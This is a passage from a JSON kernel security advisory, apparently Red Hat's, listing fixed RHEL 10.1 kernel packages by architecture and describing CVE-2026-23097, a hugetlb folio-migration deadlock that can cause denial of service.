"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: macvlan: fix possible UAF in macvlan_forward_source()"
},
{
"cve": "CVE-2026-23097",
"cwe": {
"id": "CWE-833",
"name": "Deadlock"
},
"discovery_date": "2026-02-04T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2436802"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel. A local attacker could exploit a deadlock vulnerability due to incorrect lock ordering between folio_lock and i_mmap_rwsem when migrating hugetlb file-backed folios. This could lead to hung tasks and potential system-wide stalls, resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Linux kernel: Denial of Service due to a deadlock in hugetlb folio migration",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A deadlock can occur when migrating hugetlb file backed folios due to incorrect lock ordering between folio_lock and the mapping i_mmap_rwsem. One task in the migration path can hold folio_lock and then block on i_mmap_lock_read. Another task such as hugetlbfs fallocate or punch hole can hold i_mmap_lock_write and then block on folio_lock. This ABBA pattern can hang tasks indefinitely and lead to a denial of service. For the CVSS the PR is N because the involved operations can be triggered by normal users who can access hugetlbfs and run memory pressure and file operations. The issue is not network reachable. Impact is denial of service due to hung tasks and potential system wide stalls.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
